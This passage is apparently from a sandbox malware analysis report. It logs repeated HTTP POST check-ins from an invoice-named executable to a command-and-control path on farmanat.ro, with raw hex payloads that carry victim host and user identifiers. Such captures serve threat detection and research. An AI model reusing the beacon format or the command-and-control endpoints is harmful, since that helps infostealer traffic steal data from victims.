Nov 25, 2021 10:51:11.739130974 CET	6812	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
356	192.168.11.20	50199	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:12.172382116 CET	6813	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:12.206692934 CET	6813	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:12.258594990 CET	6814	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
357	192.168.11.20	50200	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:12.686144114 CET	6814	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:12.720303059 CET	6815	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:12.771950960 CET	6815	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
358	192.168.11.20	50201	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:13.206222057 CET	6816	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:13.239768028 CET	6816	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:13.333662033 CET	6816	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
359	192.168.11.20	50202	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:13.758898973 CET	6817	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:13.792969942 CET	6817	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:13.844526052 CET	6818	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.11.20	49872	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:25.080255032 CET	6360	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:25.114614964 CET	6361	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:25.168153048 CET	6361	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
360	192.168.11.20	50203	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:14.276834011 CET	6818	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:14.310445070 CET	6819	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:14.360156059 CET	6819	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
361	192.168.11.20	50204	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:14.793078899 CET	6820	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:14.826673031 CET	6820	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:14.881376028 CET	6820	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
362	192.168.11.20	50205	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:15.296670914 CET	6821	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:15.330975056 CET	6821	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:15.383550882 CET	6822	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
363	192.168.11.20	50206	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:15.731164932 CET	6822	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:15.764703035 CET	6823	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:15.813746929 CET	6823	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
364	192.168.11.20	50207	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:16.250456095 CET	6824	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:16.283979893 CET	6824	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:16.338984013 CET	6824	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
365	192.168.11.20	50208	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:16.767595053 CET	6825	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:16.801800966 CET	6825	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:16.851677895 CET	6826	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
366	192.168.11.20	50209	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:17.275024891 CET	6826	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:17.308703899 CET	6827	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:17.358135939 CET	6827	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
367	192.168.11.20	50211	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:17.712223053 CET	6834	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:17.746392012 CET	6835	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:17.801593065 CET	6835	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
368	192.168.11.20	50212	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:18.178122044 CET	6836	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:18.211467981 CET	6836	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:18.262248993 CET	6836	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
369	192.168.11.20	50213	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:18.705661058 CET	6837	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:18.739916086 CET	6837	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:18.794755936 CET	6838	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.11.20	49873	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:25.780947924 CET	6362	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:25.814433098 CET	6362	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:25.867208958 CET	6362	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
370	192.168.11.20	50214	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:19.166858912 CET	6838	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:19.201040983 CET	6839	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:19.286577940 CET	6839	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
371	192.168.11.20	50215	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:19.718416929 CET	6840	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:19.752697945 CET	6840	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:19.802609921 CET	6840	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
372	192.168.11.20	50216	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:20.224991083 CET	6841	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:20.258569956 CET	6841	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:20.308312893 CET	6842	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
373	192.168.11.20	50217	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:20.725136042 CET	6842	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:20.758601904 CET	6843	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:20.808254004 CET	6843	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
374	192.168.11.20	50218	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
